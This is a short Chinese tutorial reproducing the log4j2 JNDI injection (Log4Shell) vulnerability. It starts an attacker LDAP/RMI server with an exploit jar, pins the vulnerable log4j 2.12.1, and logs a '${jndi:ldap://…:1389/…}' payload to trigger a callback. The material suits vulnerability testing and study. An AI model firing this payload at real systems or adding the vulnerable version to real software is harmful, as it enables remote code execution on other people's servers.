log4j2 JNDI注入漏洞问题复现

log4j2 JNDI注入漏洞问题复现 最近大家应该都有被log4j2的JNDI注入漏洞搞的心烦意乱，当程序将用户输入的数据进行日志输出时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码。

以下为改问题的复现方法：

1、首先下载JNDI-Injection 起 RMI 或者 LDAP 服务 ①前往这里下载

②使用以下命令启动服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

 如下为启动后的截图，马赛克仅为我的ip

2、本地新建一个maven项目 ①pom引用如下

    org.apache.logging.log4j
	log4j-core
	2.12.1


	org.apache.logging.log4j
	log4j-api
	2.12.1

 ②直接使用main方法输出日志，代码如下，你的ip 需要自己修改：

public class App {
	private static final Logger logger = LogManager.getLogger(App.class);
	public static void main(String[] args) {
		logger.error(" ${jndi:ldap://你的ip:1389/log4jtest}");
	}
}

3、ldap服务端有日志输出，则说明问题复现，如下截图